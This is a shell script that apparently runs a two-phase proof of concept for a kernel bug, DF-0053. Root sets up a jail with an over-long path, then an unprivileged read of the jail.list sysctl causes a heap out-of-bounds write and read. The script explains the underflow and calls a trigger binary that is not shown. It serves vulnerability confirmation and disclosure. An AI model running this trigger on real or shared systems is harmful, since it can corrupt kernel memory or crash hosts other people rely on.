DF-0053 / run.sh
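#!/bin/sh
# DF-0053 PoC run - two-phase.
#
# Phase 1 (root): create a jail with a deep chroot path + max hostname +
#                 a few IPs, so sysctl_jail_list's per-jail formatted line
#                 ("JID <space> hostname <space> fullpath") exceeds the
#                 1024-byte per-jail budget -> unsigned underflow ->
#                 heap OOB write + OOB read.
# Phase 2 (any unprivileged user): read sysctl jail.list -> trigger the bug.
#
# Usage: ./run.sh           # auto-detect: root does phase 1, user does phase 2
#        ./run.sh setup     # phase 1 only (root)
#        ./run.sh trigger   # phase 2 only (any user)
#
# Expected output (bug present): "BUG DF-0053 CONFIRMED: ... OOB READ ..."
# Expected output (fixed kernel): "[-] output (N) <= jlssize (N)" and exit 0.
#
# SAFETY: phase 2 deliberately drives a kernel heap OOB write/read. On an
# unpatched kernel this can corrupt kernel memory or panic the host, so run
# it only on a disposable test VM, never on a shared or production system.
#
# Exit status: 0 when the selected phase completes; 2 on a usage error or a
# missing helper (script/binary); otherwise the status of the failing helper
# (set -e aborts on the first failing command).

set -e
cd "$(dirname "$0")"   # helper script and trigger binary live next to run.sh

usage() {
    printf 'usage: %s [setup|trigger]\n' "${0##*/}" >&2
    exit 2
}

# At most one positional argument: the mode. Unknown modes are rejected
# instead of silently falling through to the trigger phase.
[ "$#" -le 1 ] || usage
MODE=${1:-auto}
case "$MODE" in
    setup|trigger|auto) ;;
    *) usage ;;
esac

# Resolve "auto": root provisions (phase 1), everyone else triggers (phase 2).
if [ "$MODE" = "auto" ]; then
    if [ "$(id -u)" -eq 0 ]; then
        MODE=setup
    else
        MODE=trigger
    fi
fi

if [ "$MODE" = "setup" ]; then
    # Jail creation needs root; fail early with a clear message rather than
    # letting setup_jail_v3.sh die part-way through provisioning.
    if [ "$(id -u)" -ne 0 ]; then
        printf 'run.sh: setup (phase 1) must be run as root\n' >&2
        exit 2
    fi
    if [ ! -r ./setup_jail_v3.sh ]; then
        printf 'run.sh: ./setup_jail_v3.sh not found or not readable\n' >&2
        exit 2
    fi
    echo "=== DF-0053 phase 1 (root): provisioning long-path jail ==="
    # "60 4" is passed straight through to setup_jail_v3.sh -- presumably the
    # chroot path depth and the number of IPs (see the header); confirm against
    # that script before changing them.
    sh ./setup_jail_v3.sh 60 4
    exit 0
fi

# Phase 2: the trigger binary must already have been built.
if [ ! -x ./jail_list_trigger ]; then
    printf 'run.sh: ./jail_list_trigger missing or not executable (build it first)\n' >&2
    exit 2
fi
echo "=== DF-0053 phase 2 (uid=$(id -u)): triggering jail.list ==="
./jail_list_trigger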